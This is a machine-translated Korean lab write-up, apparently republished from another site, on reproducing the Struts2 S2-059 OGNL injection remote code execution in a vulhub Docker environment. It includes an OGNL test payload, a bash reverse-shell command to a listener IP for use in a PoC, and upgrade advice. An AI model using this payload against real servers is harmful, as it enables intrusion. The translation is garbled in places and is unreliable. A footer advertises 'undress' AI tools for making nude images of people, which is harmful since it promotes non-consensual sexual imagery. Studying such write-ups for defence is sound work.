찾다
운영 및 유지보수안전Struts2 S2-059 원격 코드 실행 취약점은 어떻게 재현됩니까?

0x00 소개

Struts2는 Apache 소프트웨어 조직에서 출시한 매우 강력한 Java 웹 오픈 소스 프레임워크로, 본질적으로 서블릿과 동일합니다. Struts2는 MVC 아키텍처를 기반으로 하며 명확한 프레임워크 구조를 가지고 있습니다. 일반적으로 모델과 뷰 간의 데이터 상호 작용을 설정하는 컨트롤러로 사용되며 엔터프라이즈 수준의 Java 웹 애플리케이션을 만드는 데 사용됩니다. Java Servlet API를 활용하고 확장하며 개발자가 MVC 아키텍처를 채택하도록 권장합니다. Struts2는 WebWork의 뛰어난 디자인 아이디어를 핵심으로 삼고 Struts 프레임워크의 장점 중 일부를 흡수하며 MVC 디자인 패턴으로 구현된 더욱 깔끔한 웹 애플리케이션 프레임워크를 제공합니다.

0x01 취약점 개요

공격자는 악의적인 OGNL 표현식을 구성하고 외부 입력에 의해 수정되도록 설정할 수 있으며, OGNL 표현식의 Struts2 태그 속성 값을 실행하여 OGNL 표현식 구문 분석을 유발하여 궁극적으로 원격 코드 실행의 영향.

0x02 Impact Scope

Struts 2.0.0 – Struts 2.5.20

0x03 Environment Construction

1 이 취약점 환경은 vulhub 다운로드 주소는 다음과 같습니다:

https: //github .com/vulhub/vulhub

cd vulhub-master/struts2/s2-059

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2 docker-compose를 사용하여 사격장 환경을 빠르게 구축하세요

docker-compose up -d

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

3. 시작 완료 그런 다음 브라우저에서 http://ip:8080/?id=1을 방문하면 테스트 인터페이스

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x04 취약점 재발

1을 볼 수 있습니다. :8080/ ?id=%25{88*88} 브라우저에서 실행된 88*88이 성공적으로 파싱된 것을 확인할 수 있으며, OGNL 표현식의 Struts2 태그 속성값이 실행되어 OGNL 표현식이 발생하는 것을 확인할 수 있습니다. 구문 분석됩니다.

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

2. POC를 사용하여 셸을 바운스합니다. 바운스 셸의 페이로드는 base64

bash -i >& /dev/tcp/172.16.1.132/9967 0>&1

base64로 인코딩되어야 합니다. 인코딩 URL:

원래 문장은 이미 링크를 제공하는 완전한 문장입니다. 다시 작성하면 다음과 같을 수 있습니다. 다음은 런타임 실행 페이로드에 대한 정보가 포함된 웹페이지 링크입니다: http://www.jackson-t.ca/runtime-exec-payloads.html. poc의 페이로드를 자신의 페이로드로 수정한 다음 다음을 사용하여 실행하세요. python.shell이 ​​리바운드된 것을 볼 수 있습니다

Struts2 S2-059 远程代码执行漏洞复现是怎么样的

0x05 수리 제안
1. Struts 2.5.22 이상 버전으로 업그레이드하세요

2. ONGL 표현식 주입 방지 조치를 활성화합니다.

Struts2 S2-059 远程代码执行漏洞复现是怎么样的https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable

위 내용은 Struts2 S2-059 원격 코드 실행 취약점은 어떻게 재현됩니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
이 기사는 亿速云에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

Video Face Swap

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

DVWA

DVWA

DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는

WebStorm Mac 버전

WebStorm Mac 버전

유용한 JavaScript 개발 도구

Atom Editor Mac 버전 다운로드

Atom Editor Mac 버전 다운로드

가장 인기 있는 오픈 소스 편집기

에디트플러스 중국어 크랙 버전

에디트플러스 중국어 크랙 버전

작은 크기, 구문 강조, 코드 프롬프트 기능을 지원하지 않음

MinGW - Windows용 미니멀리스트 GNU

MinGW - Windows용 미니멀리스트 GNU

이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.